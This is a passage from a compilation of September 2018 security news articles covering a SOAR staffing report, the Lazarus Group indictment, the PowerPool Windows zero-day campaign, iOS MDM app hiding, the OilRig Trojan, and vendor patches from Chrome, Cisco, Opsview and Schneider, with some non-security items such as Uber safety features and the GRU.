It's worth noting, however, that moving on to greener pastures is not the only cause of failing to retain existing staff. As many as 27.2% of security employees leave because of over work and fatigue. This echoes a comment from Jerome Segura at Malwarebytes: "There's a lot of burnout in infosec. It's tough, but that's the reality. If you're in infosec, you're on call 24/7."

According to the report's respondents, their primary concerns -- or pain points -- are they currently receive too many alerts (cited by 46.4% of respondents; an issue that will be aggravated by staff shortages); and too many false positives within those alerts (cited by 69% of respondents; an issue that is technology based).

Affecting both of these (but not specifically cited as a pain point) is the number of different tools used by the security team. More than three-quarters of the respondents have to learn how to use more than four different security tools for effective security operations and incident response. "With the number of tools constantly on the rise, high training times and attrition rates truly spell out the gravity of the human capital challenge facing the industry today."

Bhargava explains further. “Security deployment has become fractured with innumerous specialized tools, making it increasingly difficult for security teams to manage alerts across disparate systems and locations, particularly considering the talent shortage present in security today,” said Bhargava. “There is a great opportunity for SOAR tools to help unify these products and processes, using automated response to reduce alert fatigue and direct analyst resources to the alerts which are most likely to cause harm.”

It is Demisto's premise -- it is itself a SOAR vendor -- that SOAR technology can help alleviate these difficulties. "An important goal of our study was to find and validate linkages between high incident loads, high response teams, and the desire for automation." First the report quantifies the individual workload. More than 12,000 alerts are reviewed each week; and each alert takes more than 4 days to resolve.

There are simply too many alerts for the security team to handle manually. It is, says the report, "clear that there’s a vicious cycle in effect. Alert volume leads to increased MTTR [mean time to respond] which in turn leads to even more alert volume." Automation as a solution is already in use, with more than half of the respondents automating or seeing the benefit in automating much of the incident response workload.

"Proactively," says the report, "security operations and threat hunting ranked high on the ‘automation candidates’ list, highlighting security teams’ desire for automation to assist them in identifying incipient threats and vulnerabilities. Reactively, incident response, tracking IR metrics, and case management were felt as good candidates for partial or full automation."

For now, SOAR is still an emergent technology. "A sign of SOAR’s emergent nature is highlighted by around 20% of our responders being unsure about where to include SOAR in their budgets," admits the report. "A growing acknowledgement of SOAR in security budgets will come with increased awareness and continued verifiable benefits in existing SOAR deployments."

Demisto believes, however, that SOAR has the potential to improve proactive threat hunting, standardize incident processes, improve investigations, accelerate and scale incident response, simplify security operations and maintenance, and generally fight the alert fatigue that comes with too few staff responding to too many alerts.

Cupertino, Calif.-based Demisto raised $20 million in a Series B funding round in February 2017, bringing the total raised to $26 million. In May 2018, Gartner included Demisto in its report on 'Cool Vendors in Security Operations and Vulnerability Management'.


U.S. Charges North Korean Over Lazarus Group Hacks
7.9.2018 securityweek CyberCrime

The U.S. Department of Justice on Thursday announced charges against a North Korean national who is believed to be a member of the notorious Lazarus Group, to which governments and the cybersecurity industry have attributed several high profile attacks.

The suspect is Park Jin Hyok, who according to the DOJ worked for a North Korean government front company known as Chosun Expo Joint Venture and Korea Expo Joint Venture (KEJV). The Democratic People’s Republic of Korea allegedly used this company, which also has offices in China, to support its cyber activities.

The complaint, filed on June 8 in a U.S. District Court in Los Angeles and made public on Thursday, accuses Park and other members of the Lazarus Group of conducting destructive cyberattacks that resulted in “damage to massive amounts of computer hardware and extensive loss of data, money and other resources.”United States charges North Korean hacker of the Lazarus Group

The complaint describes both successful and unsuccessful campaigns of the threat actor, but it focuses on four operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of several U.S. defense contractors, including Lockheed Martin, over the course of 2016 and 2017.

Five Eyes countries and Japan last year officially blamed North Korea for the WannaCry attack.

According to the DOJ, Park worked as a computer programmer at KEJV, which has been linked to DPRK military intelligence. Park allegedly did programming work for the company’s paying clients, while also engaging in malicious activities on behalf of Pyongyang.

The man has been charged with one count of conspiracy to commit computer fraud and abuse, for which he faces up to five years in prison, and one count of conspiracy to commit wire fraud, which carries a sentence of up to 20 years in prison.

“DPRK cyber adversaries represent some of the most active and disruptive threat groups today,” said Dmitri Alperovitch, CTO and co-founder of CrowdStrike. “Their tradecraft continues to grow in sophistication, leveraging cyber capabilities for conducting data exploitation, data destruction, cyber espionage and financially-motivated criminal activity — often costing organizations millions of dollars in damages. In the past year, we’ve witnessed DPRK commit to expansive cyber operations in support of their ability to service regime priorities and effectuate national interest. These crimes have impacted the global financial system and nearly every sector of the economy.”

“One of the most important steps taken towards achieving effective cyber deterrence is the attribution of these attacks and holding the perpetrators accountable, as we witnessed today by the announcement of the US Department of Justice,” Alperovitch added.

FDD Senior Fellow David Maxwell, who specializes in North Korea’s nuclear and cyber threats, noted that the charges represent a critically important development.

“Although there is a significant time lapse between the hack and this indictment, it shows that the U.S. is tracking the North Korea threat, and that despite the current nuclear diplomacy the U.S. will pursue cyber operatives and hacker/criminals who wish to do the U.S. and the U.S. economy harm,” Maxwell said via email.

“The U.S. has to address cyber threats, though this is just one very small step toward improving cyber defenses. The U.S. has to make it known it will hunt down hackers who do us harm, whether they are individuals or working for state actors such as North Korea,” he added.

This is not the first time the United States has charged foreign nationals over cyberattacks believed to have been sponsored – or at least condoned – by their respective governments. The DOJ in the past years unsealed indictments against Chinese, Russian, Syrian and Iranian nationals.


Recently uncovered PowerPool Group used recent Windows Zero-Day exploit
7.9.2018 securityaffairs
Exploit

Security experts from ESET observed a treat actor, tracked as PowerPool, exploiting the recently disclosed Windows zero-day flaw in targeted attacks.
The vulnerability was publicly disclosed on August 27 by the security expert “@SandboxEscaper,” the researcher also published the exploit code for the vulnerability.

The vulnerability affects Microsoft’s Windows operating systems that could be exploited by a local attacker or malicious program to obtain system privileges on the vulnerable system.

The vulnerability resides in the Windows’ task scheduler program and ties to errors in the handling of Advanced Local Procedure Call (ALPC) systems.

Microsoft was expected to address the vulnerability in September security Patch Tuesday, that is scheduled for September 11, but the news of live attacks exploiting the issue could force the company to roll out a patch sooner.

Security community 0patch has also released an unofficial patch for the vulnerability.

Now security researchers from ESET reported the local privilege escalation vulnerability has been exploited by a previously unknown group tracked as PowerPool.

“As one could have predicted, it took only two days before we first identified the use of this exploit in a malicious campaign from a group we have dubbed PowerPool.“reads the analysis published by ESET.

“This group has a small number of victims and according to both our telemetry and uploads to VirusTotal (we only considered manual uploads from the web interface), the targeted countries include Chile, Germany, India, the Philippines, Poland, Russia, the United Kingdom, the United States and Ukraine.”

The threat actor leveraged the Windows zero-day exploit in targeted attacks against a small number of users located in the United States, the United Kingdom, Germany, Ukraine, Chile, India, Russia, the Philippines, and Poland.

According to ESET, attackers have modified the publicly available exploit source code and recompiled it.

To obtain a Local Privilege Escalation, the attacker needs to properly choose the target file that will be overwritten. The target file, in fact, has to be a file that is executed automatically with administrative rights.

“PowerPool’s developers chose to change the content of the file C:\Program Files (x86)\Google\Update\GoogleUpdate.exe. This is the legitimate updater for Google applications and is regularly run under administrative privileges by a Microsoft Windows task.” continues the analysis.

PowerPool’s attack vector is spear-phishing messages, ESET researchers pointed out that the same group was also responsible for a spam campaign spotted by SANS in May that used Symbolic Link (.slk) files to spread malicious codes.

PowerPool group

The group used a multi-stage malware, the first stage is a backdoor used for a reconnaissance activity. It determines if the infected machine is interesting for the attackers, in this case, the malicious code downloads a second stage backdoor that supports various commands such as uploading and downloading files, killing processes, and listing folders.

The analysis of the second-stage backdoor allowed the researchers to determine that the malicious code is not “a state-of-the-art APT backdoor.”

“Once the PowerPool operators have persistent access to a machine with the second-stage backdoor, they use several open-source tools, mostly written in PowerShell, to move laterally on the network.” continues the report.

The tools used by the attackers include PowerDump, PowerSploit, SMBExec, Quarks PwDump, and FireMaster.

“This specific campaign targets a limited number of users, but don’t be fooled by that: it shows that cybercriminals also follow the news and work on employing exploits as soon as they are publicly available,” ESET concluded.

Further details, including the IoCs are reported in the analysis published by ESET.


Attackers Abuse Age Restrictions to Hide Apps on iOS Devices
6.9.2018 securityweek Apple

Malicious actors leveraging an open source mobile device management (MDM) system have been abusing a legitimate iOS feature to hide legitimate applications and trick victims into using malicious counterparts.

The attacks, first exposed by Talos’ security researchers in July, involved the use of malicious versions of five programs (AppsSLoader, Telegram, WhatsApp, PrayTime, and MyApp) that were then deployed onto iOS devices to steal messages.

Given how the enrollment process for the MDM works, the security researchers assumed right from the start that the rogue applications were being installed either via direct access to the compromised devices or through sophisticated social engineering. Each step of the enrollment process required user interaction, Talos discovered.

The security researchers now reveal that the attackers abused the MDM solution to control the victims’ devices and deploy a new profile onto them. Next, the actors leveraged the age rating restriction functionality in iOS to hide the legitimate apps.

The age ratings for WhatsApp and Telegram are 12-plus and 17-plus, respectively, and the actors set the age rating limit to 9-plus. Thus, the legitimate apps would no longer be shown on the device and the victim was only able to access the rogue variants instead.

“The app still exists on the device, however, the user will not be able to interact with it, even if the user searches for the app using the search function on the iOS device. It simply does not open. All mobile device users should be aware of these attack methods as to prevent attackers from gaining control of their phones through an MDM,” Talos explains.

iOS supports the configuring of devices using profiles, and the MDM enrollment mechanism too is performed using a profile. Such profiles are easy to create and Apple even offers an official tool for that. These apps allow for the restriction of app usage, but the app restriction is usually limited to the supervised device.

The iPhones impacted by these attacks, however, were not in supervised mode. Instead, the attackers abused the age rating to forbid the usage of apps rated for ages 9 and above. Thus, the apps remained on the device but could no longer be accessed.

“Once this profile is installed on the iOS device, the applications restricted by the age rating stay installed, but can no longer be used or accessed, and the icon disappears from the device springboard,” Talos explains.

The profile can be installed manually via Apple Configurator, or by opening the profile XML from Safari. Once that happens, a new entry appears in the Settings > General > Profile menu. However, if the MDM deploys the profile, it does not appear there (the MDM enrollment profile will be present).

“It's important to note here that there is no malicious malware, vulnerability or zero-day used to enroll the phone within the MDM. It is a legitimate method of device administration that is used within enterprises throughout the world. The attacker has merely leveraged this process,” the researchers note.

Users can head to Settings > General > Profiles & Device Management > [MDM configuration] on their iOS devices to view information about the restrictions and applications set/installed by MDM profiles. If no Profiles & Device Management menu is available, the device is not enrolled.


Mozilla Appoints New Policy, Security Chief
6.9.2018 securityweek Security

Mozilla on Tuesday announced that Alan Davidson has been named the organization’s new Vice President of Global Policy, Trust and Security.

According to Mozilla Chief Operating Officer Denelle Dixon, Davidson will work with her on scaling and reinforcing the organization’s “policy, trust and security capabilities and impact.”

His responsibilities will also include leading Mozilla’s public policy work on promoting an open and “healthy” Internet, and supervising a security and trust team whose focus is on promoting “innovative privacy and security features.”

“For over 15 years, Mozilla has been a driving force for a free and open Internet, building open source products with industry-leading privacy and security features. I am thrilled to be joining an organization so committed to putting the user first, and to making technology a force for good in people’s lives,” said Davidson.Alan Davidson named Mozilla’s new VP of Global Policy, Trust and Security

Prior to joining Mozilla, Davidson worked for the U.S. Department of Commerce, the New America think tank, and Google. At Google, he helped launch the tech giant’s Washington D.C. office and led the company’s public policy and government relations efforts in the Americas.

“Alan is not new to Mozilla,” Dixon said. “He was a Mozilla Fellow for a year in 2017-2018. During his tenure with us, Alan worked on advancing policies and practices to support the nascent field of public interest technologists — the next generation of leaders with expertise in technology and public policy who we need to guide our society through coming challenges such as encryption, autonomous vehicles, blockchain, cybersecurity, and more.”

Mozilla last week laid out plans to add various anti-tracking features to Firefox in an effort to protect users and help them choose what information they share with the websites they visit.

The new features include a mechanism designed to block trackers that slow down page loads, stripping cookies and blocking storage access from third-party tracking content, and blocking trackers that fingerprint users and sites that silently mine cryptocurrencies. Some of these new features are already present in Firefox Nightly and are expected to become available in the stable release of the web browser in the near future.


Iranian Hackers Improve Recently Used Cyber Weapon
6.9.2018 securityweek BigBrothers

The Iran-linked cyberespionage group OilRig was recently observed using a variant of the OopsIE Trojan that was updated with new evasion capabilities, Palo Alto Networks reports.

The group has been persistently targeting government entities in the Middle East with previously identified tools and tactics, including the OopsIE Trojan that was first identified in February 2018. Unlike previously observed samples, the new iteration packs anti-analysis and anti-virtual machine capabilities, which allows it to further evade detection.

The attacks involving this Trojan variant were detected in July, as part of a campaign that also delivered the QUADAGENT backdoor. However, each malicious program was targeting a different organization.

As part of that wave of attacks, the hackers were using compromised email accounts at a government organization in the Middle East to send spear phishing emails delivering the OopsIE Trojan. The attacks targeted a government agency within the same nation state, Palo Alto Networks’ researchers found.

The email was sent to the email address of a user group that had published documents regarding business continuity management on the Internet. The attackers used lures specifically crafted for this assault.

The OopsIE Trojan begins execution by performing multiple anti-virtualization and sandbox checks. The malware would check CPU fan information, temperature, mouse pointer, hard disk, motherboard, time zone, and human interaction, while also looking for DLLs associated with Sandboxie, VBox, and VMware.

While some of these techniques have been observed in other malware before, OopsIE appears to be the first to check the CPU fan. The CPU temperature check was previously seen being used by GravityRAT.

The time zone check is also of interest, as the Trojan would only execute if it finds strings for Iran, Arab, Arabia and Middle East. These point to five time zones that encompass 10 countries, showing that the malware is highly targeted.

The updated Trojan variant packs most of the functionality previously associated with the threat, but also includes obfuscation, in addition to requiring the user to interact with an error dialog box (the last in the previously mentioned series of checks).

Next, the malware sleeps for two seconds, then moves itself to the App Data folder and creates a scheduled task to run a VBScript that ensures persistence. The process attempts to run the Trojan every three minutes.

The malware then starts communication with the command and control (C&C) server (it uses the www.windowspatch[.]com domain as C&C).

The malware includes support for various commands that it receives from the server. It can run the command, write the output to a file and send it to the server; download a file to the system; read a specified file and upload its contents, and uninstall itself.

“Within the time frame we have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found functionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication to their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary is highly resourceful and continues to adapt over time,” Palo Alto Networks concludes.


Windows Zero-Day Exploited in Targeted Attacks by 'PowerPool' Group
6.9.2018 securityweek
Exploit

A threat group tracked by security firm ESET as “PowerPool” has been exploiting a Windows zero-day vulnerability to elevate the privileges of a backdoor in targeted attacks.

The flaw was disclosed on August 27 by a researcher who uses the online moniker “SandboxEscaper.” The security hole was not reported to Microsoft before its details were made public – including a compiled exploit and its source code – as SandboxEscaper was apparently frustrated with the company’s vulnerability reporting process.

Other members of the industry quickly confirmed the vulnerability, which seems to affect the Advanced Local Procedure Call (ALPC) interface of the Windows Task Scheduler. Malicious actors with local access to the targeted device can exploit the flaw to escalate privileges to SYSTEM by overwriting files that should normally be protected by filesystem access control lists (ACLs).

The public exploit has been confirmed to work on 64-bit versions of Windows 10 and Windows Server 2016, with the possibility to adapt it for 32-bit systems as well.

Microsoft has launched an investigation, but it has yet to release a patch or provide mitigations. While the tech giant initially suggested that a fix may be released with its regular Patch Tuesday updates, the company may roll out a patch sooner now that the vulnerability has been exploited in malicious attacks.

In the meantime, 0patch has released an unofficial fix for the vulnerability and CERT/CC’s advisory for the bug describes some mitigations.

According to ESET, the local privilege escalation vulnerability has been exploited by a newly uncovered group it tracks as PowerPool. Based on the security firm’s telemetry and malware samples uploaded to VirusTotal, the threat actor appears to have leveraged the Windows zero-day against a small number of users located in the United States, the United Kingdom, Germany, Ukraine, Chile, India, Russia, the Philippines and Poland.

ESET researchers determined that PowerPool slightly modified the publicly available exploit source code and recompiled it for its attacks.

The hackers, whose possible origins have not been discussed by the security firm, have used the zero-day to overwrite C:\Program Files(x86)\Google\Update\GoogleUpdate.exe, a legitimate updater for Google applications. Since this file is regularly executed in Windows with administrative privileges, overwriting it with their malware has allowed the attackers to obtain elevated permissions on the targeted system.

ESET believes PowerPool attacks begin with a malware-carrying email being sent to the targeted user. While the campaign involving the zero-day appears to be highly targeted, an interesting spam campaign spotted by SANS in May, which used Symbolic Link (.slk) files for malware distribution, was apparently carried out by the same group.

The first stage malware used by PowerPool, which is delivered via the initial emails, is a backdoor designed for reconnaissance purposes. If the infected machine presents an interest to the attackers, the malware downloads a second stage backdoor capable of executing commands on the system, uploading and downloading files, killing processes, and listing folders.

The files downloaded by the second stage malware to compromised devices include several open source tools that allow the attackers to move laterally on the network. The list includes PowerDump, PowerSploit, SMBExec, Quarks PwDump, and FireMaster.

ESET has described this second stage malware as “clearly not a state-of-the-art APT backdoor.”

“This specific campaign targets a limited number of users, but don’t be fooled by that: it shows that cybercriminals also follow the news and work on employing exploits as soon as they are publicly available,” ESET concluded.


Latest Version of Chrome Improves Password Management, Patches 40 Flaws
6.9.2018 securityweek
Vulnerebility

Google this week celebrates 10 years of its Chrome web browser with the release of a new version that provides users with security improvements, new features, and patches for 40 vulnerabilities.

The highly popular web browser now has an improved password manager that makes it easier for users to have a unique and strong password for each site. When a user is setting a new password, Chrome can generate it and save it, so that it is easily accessible on both computers and phones.

Chrome 69 also brings updated site indicators, as it no longer marks HTTPS websites with a green lock. Instead, the indicator is now grey, given that Google considers HTTPS connections the norm.

Starting with Chrome 68, Google is marking sites served over HTTP connections as “Not Secure”, in order to warn users that data transmitted between the site and the browser is susceptible to man-in-the-middle attacks and other types of threats. Attackers could even modify the content of web pages before they are delivered to the user.

Some of the new features in the browser include answers directly in the address bar (the Omnibox), improved site shortcut management, and new looks that include modified shape of tabs to make site icons easier to see.

Chrome Enterprise 69 now blocks third-party software to provide users with improved stability, requires users to grant explicit permission for Adobe Flash to run on sites still using it (the permission is asked after each browser restart), and prevents password reuse with a Password Alert policy.

Google also addressed a total of 40 security vulnerabilities with the release of Chrome 69, 22 of which were reported by external researchers. Of these, 7 were High risk flaws, 13 were Medium severity, and 2 were Low risk bugs.

Some of the addressed issues include out of bounds writes (in V8, Blink, WebAudio, Mojo, SwiftShader, Little-CMS , PDFium, and WebRTC), integer overflow in Skia, use after free (in WebRTC and Memory Instrumentation), Site Isolation bypasses, cross origin pixel leak, local file access, content security policy bypass, credit card information leak, URL spoofs, and stack buffer overflow in SwiftShader.

Google paid nearly $30,000 in bug bounty rewards to the reporting researchers, but the company hasn’t revealed information on all of the awarded bounties.

The latest browser iteration is now available for download for Windows, Mac and Linux as Chrome 69.0.3497.81.


Multiple Vulnerabilities Addressed in Opsview Monitor
6.9.2018 securityweek
Vulnerebility

Opsview recently addressed a series of remote code-execution, command-execution and local privilege-escalation vulnerabilities in the Opsview Monitor.

A proprietary monitoring application for networks and applications, Opsview Monitor “helps DevOps teams deliver smarter business services by providing unified insight into their dynamic IT operations whether on-premises, in the cloud, or hybrid,” the company says.

The software is impacted by five vulnerabilities that could provide attackers with the ability to access the management console and execute commands on the operating system.

Discovered by Core Security researchers earlier this year, the bugs were confirmed to impact all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition to patches (the 5.4.2 and 5.3.1 updates) for the affected versions, Opsview also released a new product iteration that removed the issues from the start.

A virtual appliance deployed inside the organization's network infrastructure, Opsview Monitor is bundled with a Web Management Console that allows for the monitoring and management of hosts and their services.

The first two issues found in the appliance could be abused to execute malicious JavaScript code in the context of a legitimate user. These are CVE-2018-16148, a reflected Cross-Site Scripting (XSS) in the 'diagnosticsb2ksy' parameter of the '/rest' endpoint, and CVE-2018-16147, a persistent XSS in the 'data' parameter of the '/settings/api/router' endpoint.

“The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. […] this XSS is self-stored and it's executed only in the context of the victim's session. [The] vulnerability can be exploited by an attacker to gain persistency and execute the malicious code each time the victim accesses to the settings section,” Core Security explains.

Two other vulnerabilities could allow an attacker to obtain command execution on the system as the nagios user. Tracked as CVE-2018-16146 and CVE-2018-16144, both of these are improper sanitization bugs.

Tracked as CVE-2018-16145, the fifth vulnerability could lead to local privilege escalation. An attacker could edit a specific part of a script to execute code once the appliance is rebooted (at boot, scripts impersonate the nagios user during their execution).

The bugs were reported to Opsview in early May and were confirmed within a week. The company released Opsview Monitor 6.0 at the end of July and pushed fixes for previous software iteration last week.


Uber Announces Ramped Up Passenger Security
6.9.2018 securityweek Security

Uber chief Dara Khosrowshahi said on Wednesday the smartphone-summoned ride service is reinforcing safeguards for passengers and their personal information.

Features to be added to the app in the coming months include "Ride Check," which uses location tracking already built into the service to detect when cars have stopped unexpectedly.

If a crash is suspected, the driver and passenger will receive a prompt on their phones to order a courtesy ride or use the in-app emergency call button introduced earlier this year.

"This technology can also flag trip irregularities beyond crashes that might, in some rare cases, indicate an increased safety risk," Khosrowshahi said in a blog post.

"For example, if there is a long, unexpected stop during a trip, both the rider and the driver will receive a Ride Check notification to ask if everything is OK."

Uber, which operates in 65 countries, has disrupted transport in many locations despite regulatory hurdles and resistance from taxi operators.

The company has been touting a safety-first message amid plans for an initial public offering of shares late next year.

Khosrowshahi said the service will begin leaving pick-up and drop-off addresses out of drivers' trip history logs, showing only general areas to avoid creating databases of sensitive locations such as home addresses.

The service already lets drivers and passengers waiting to be picked up communicate through the app without revealing their phone numbers. People can also request pick-ups at intersections instead of specific street addresses.

"Uber has a responsibility to help keep people safe, and it's one we take seriously," Khosrowshahi said.

"We want you to have peace of mind every time you use Uber, and hope these features make it clear that we've got your back."


Cisco Patches Serious Flaws in RV, SD-WAN, Umbrella Products
6.9.2018 securityweek
Vulnerebility

Cisco informed customers on Wednesday that patches are available for over a dozen critical and high severity vulnerabilities affecting the company’s RV series, SD-WAN, Umbrella and other products.

Two of the flaws have been rated “critical” by Cisco. One of them, CVE-2018-0423, is a buffer overflow vulnerability in the web-based management interface of various RV series firewalls and routers. The security hole allows a remote and unauthenticated attacker to cause a denial-of-service (DoS) condition or to execute arbitrary code.

The second flaw assigned a “critical” rating by the networking giant is CVE-2018-0435 and it impacts the Cisco Umbrella API. A remote attacker could leverage the vulnerability to read or modify data across multiple organizations, but exploitation requires authentication. Cisco noted that the bug has been addressed in the API and no user interaction is required to apply the patch.

The critical vulnerability affecting RV series devices was reported to Cisco by Qingtang Zheng of the 360 ESG CodeSafe Team, who also discovered three additional high severity flaws in the management interface of these products.

Two of the flaws allow an attacker to remotely gain access to sensitive information and one can be exploited for arbitrary command execution, but the latter requires authentication.

The Umbrella solution is also affected by some high severity flaws. Specifically, the Umbrella Enterprise Roaming client has a couple of weaknesses that can be exploited by an authenticated attacker to elevate privileges to “Administrator.” These issues were discovered by a researcher from Critical Start, which has published its own blog post providing detailed technical information.

Cisco’s SD-WAN solution is also impacted by high severity vulnerabilities. They can allow hackers to gain access to sensitive data, execute commands as root, and elevate privileges, but some require either local access and/or authentication.

The company also informed customers that patches are available for serious privilege escalation and information disclosure bugs in WebEx, a DoS flaw in Prime Access Registrar, a privilege escalation in Data Center Network Manager, and two command injections in the Integrated Management Controller (IMC) software.

Cisco is not aware of any instances where these vulnerabilities have been exploited for malicious purposes.


Man Charged With Cyberstalking Women for Explicit Photos
6.9.2018 securityweek Cyber

LOS ANGELES (AP) — A former NASA contractor who allegedly threatened to publish nude photos of seven women unless they sent him other explicit pictures has been arrested at his Los Angeles home.

Richard Bauer was arrested Wednesday.

Prosecutors say Bauer contacted some victims through Facebook and got them to reveal information he could use to reset their online passwords. He allegedly got other victims to install computer malware that allowed him to obtain email and website passwords.

Bauer allegedly threatened to post nude photos he'd obtained of the victims online unless they sent more photos.

He's facing 14 federal charges of stalking, unauthorized computer access and identity theft, which carry a possible 64-year sentence.

Bauer worked at NASA's Armstrong Flight Research Center in Southern California.

It's unclear if he has a lawyer.


VPN Company AnchorFree Raises $295 Million
6.9.2018 securityweek IT

AnchorFree, the company that makes the popular Hotspot Shield virtual private network (VPN) software, on Wednesday announced that it raised $295 million in a new funding round.

The latest funding brings the total raised by the California-based company to nearly $358 million, which represents a significant amount for a VPN services provider. These types of services have become increasingly popular following the numerous privacy-related scandals involving governments and private firms.

The round was led by media and tech investment group WndrCo with participation from Accel, 8VC, SignalFire, Green Bay Ventures and other investors and executives. Representatives of WndrCo and Accel have joined the company’s board of directors.

According to AnchorFree, the newly secured funds will be used to “further product development and market expansion and drive M&A activity.”

AnchorFree claims its products provide enterprise-level privacy and security for consumers’ mobile devices. This includes protection against ISPs and websites collecting identity data, compromised public Wi-Fi connections, phishing attacks, and malware.

The company, led by CEO and co-founder David Gorodyansky, says its products have been downloaded over 650 million times by users across 190 countries, with 250,000 new downloads each day.

AnchorFree also offers a VPN solution for small and medium-sized businesses, Hotspot Shield for Business. Its VPN technology, called Hydra, has been widely adopted by app developers and licensed by many of the world’s cybersecurity and telecoms companies.

“Anyone who accesses the Internet is vulnerable to data theft and an invasion of online privacy which has real, impactful consequences, and David and the AnchorFree team are deeply mission-driven to address this,” said WndrCo Founding Partner Sujay Jaswa.

“AnchorFree has the two most-downloaded mobile security products, including the #1 mobile VPN product, because they have the fastest most robust technology and they work for the needs of consumers, protecting against phishing, malware, and spam in addition to providing secure Internet access. This growth will only accelerate as the world’s Internet security problems continue to grow, and we look forward to supporting David and his team as they further AnchorFree’s global success in tackling this outstanding market opportunity,” Jaswa added.

AnchorFree was accused last year by the Center for Democracy & Technology (CDT), a nonprofit technology advocacy organization, of collecting user data through Hotspot Shield and sharing it with advertisers. The CDT filed a complaint with the U.S. Federal Trade Commission (FTC) over these allegations. AnchorFree has denied the accusations.

Earlier this year, a researcher disclosed the details of a vulnerability that exposed the names and locations of Hotspot Shield users. The expert made his findings public after claiming that the vendor ignored his attempts to report the flaw. A patch was released a few days later.


Flaw in Schneider PLC Allows Significant Disruption to ICS
6.9.2018 securityweek ICS

A vulnerability discovered in some of Schneider Electric’s Modicon programmable logic controllers (PLCs) may allow malicious actors to cause significant disruption to industrial control systems (ICS).

The flaw was identified by Yehonatan Kfir, CTO of industrial cybersecurity firm Radiflow, as part of an ongoing project whose goal is finding new ICS vulnerabilities. Advisories for this security hole were published recently by both Schneider Electric and ICS-CERT.

The vulnerability, tracked as CVE-2018-7789 and described as an issue related to improper checking for unusual or exceptional conditions, can be exploited by an attacker to remotely reboot Modicon M221 controllers.

According to Schneider, all Modicon M221 controllers running firmware versions prior to 1.6.2.0, which includes a patch for the issue, are impacted.Schneider Electric Modicon M221 controllers affected by serious vulnerability

Radiflow’s Kfir told SecurityWeek that while Schneider responded to the vulnerability in a “highly professional manner,” his company does not agree with the severity rating assigned by the vendor – ICS-CERT and Schneider assigned a CVSS score of 4.8, which puts the flaw in the “medium severity” category.

“In general the assessment for the scoring is usually assessed from the perspective of IT, which takes into account the vulnerability’s impact on the potential for confidential data to be compromised,” Kfir explained. “This of course is important, although less relevant to OT operations and as such the reason we think that the score could have been higher.”

“This CVE could have resulted in the controller getting stuck and causing its communication to drop from the OT network. Disconnecting the PLC from the HMI certainly has more than a low impact on the availability of the OT network. To recover from such a problem, an onsite visit from a technician to do a power reset is required. The impact of such a situation on availability seems much higher than reflected in the scoring,” the expert added.

In a press release Radiflow will publish on Thursday, the company says an attack exploiting this flaw “would cause significant downtime to the ICS network.”

Schneider Electric Modicon M221 controllers affected by serious vulnerability

The CVSS score is also lowered due to the “attack complexity” metric being described as “high.” Kfir admits that an attacker would need to be familiar with Schneider’s proprietary protocols in order to exploit the bug, but argued that threat groups focused on targeting industrial systems – one good example is the actor behind the Triton attack – have already demonstrated these types of capabilities.

“Although it may be complex for a novice to exploit this vulnerability, it would not have been difficult at all for experienced hackers to leverage this vulnerability,” Kfir said.

Radiflow says its researchers have identified two ways to exploit the vulnerability and they both work remotely. Worryingly, Kfir told SecurityWeek that a simple Shodan search revealed over 100 vulnerable devices directly accessible from the Internet.

“It is just a matter of a few clicks that could have led to a cyberattack to take down those vulnerable PLCs.” Kfir said.

Earlier this year, Radiflow reported that a piece of cryptocurrency mining malware worked its way onto servers connected to an OT network at a wastewater facility in Europe.

Other vulnerabilities in Modicon M221 controllers

Different advisories published in recent days by ICS-CERT and Schneider Electric describe three other vulnerabilities discovered by researchers in Modicon M221 controllers.

These security holes, all classified as “high severity,” can be exploited to upload the original PLC program, and decode the device’s password using a rainbow table.

Irfan Ahmed, Hyunguk Yoo, Sushma Kalle, and Nehal Ameen of the University of New Orleans have been credited for finding these flaws.

These security holes have also been addressed by Schneider with the release of firmware version 1.6.2.0.


What's GRU? A Look at Russia's Shadowy Military Spies
6.9.2018 securityweek BigBrothers

MOSCOW (AP) — GRU isn't as well-known a baleful acronym as KGB or FSB. But Russia's military intelligence service is attracting increasing attention as allegations mount of devious and deadly operations on and off the field of battle.

The latest charge came Wednesday, when Britain identified two suspects in this year's nerve-agent poisonings as GRU agents.

An overview of the GRU:

THE AGENCY

Formally named the Main Directorate of the General Staff of the Armed Forces, the agency is almost universally referred to by its former acronym GRU.

It is the most shadowy of Russia's secret services. When its previous director Igor Sergun died in 2016, the Kremlin announcement was so terse that it gave neither the date, cause or place of death.

The agency has an apparently broad mandate. According to the Defense Ministry website, it is tasked not only with "ensuring conditions conducive to the successful implementation of the Russian Federation's defense and security policy" but with providing officials intelligence " that they need to make decisions in the political, economic, defense, scientific, technical and environmental areas."

ALLEGATIONS

Britain claims that two GRU agents carried out this spring's attack with the nerve agent Novichok on Sergei Skripal, a former GRU officer who became a British double agent, and his daughter. Both survived the poisoning in the city of Salisbury, but three months later two area residents were sickened by the same nerve agent, one of them fatally — it is believed they found the discarded bottle that had carried the Skripals' poison.

This week's claim came less than two months after the U.S. indicted 12 alleged GRU agents for hacking into the Hillary Clinton presidential campaign and the Democratic Party and releasing tens of thousands of private communications, part of a sweeping conspiracy by the Kremlin to meddle in the 2016 U.S. election.

Also this year, the investigative group Bellingcat reported that a GRU officer was in charge of operations in eastern Ukraine, where Russia-backed separatists were fighting Ukrainian forces, in July 2014 when a Malaysian passenger airliner was shot down, killing all 298 people aboard. International investigators say the plane was shot down by a mobile missile launcher brought in from Russia. The GRU officer named by Bellingcat reportedly was responsible for weapons transfers.

Russia's RBC news service reported this year that the GRU oversees Russian mercenaries in Syria, fighting there as a so-called shadow army.

Russian authorities generally deny allegations against the GRU and refuse to discuss its activities. They said they didn't recognize the suspects Britain named Wednesday in the Salisbury poisoning.

OTHER AGENCIES

The GRU is one arm of Russia's extensive security and intelligence apparatus, which also includes the Foreign Intelligence Service, known as the SVR, and the Federal Security Service, or FSB, which conducts domestic intelligence and counterintelligence. The SVR and FSB were spun off from the KGB after the collapse of the Soviet Union. A former KGB agent, Vladimir Putin ran the FSB before ascending to the presidency.

And as president, Putin names the top brass in the GRU. Of all the agencies, the FSB looms largest in Russians' minds because it hunts domestic threats. The GRU, created under Soviet founder Vladimir Lenin, has a more ruthless reputation, but focuses its energies on foreign threats.

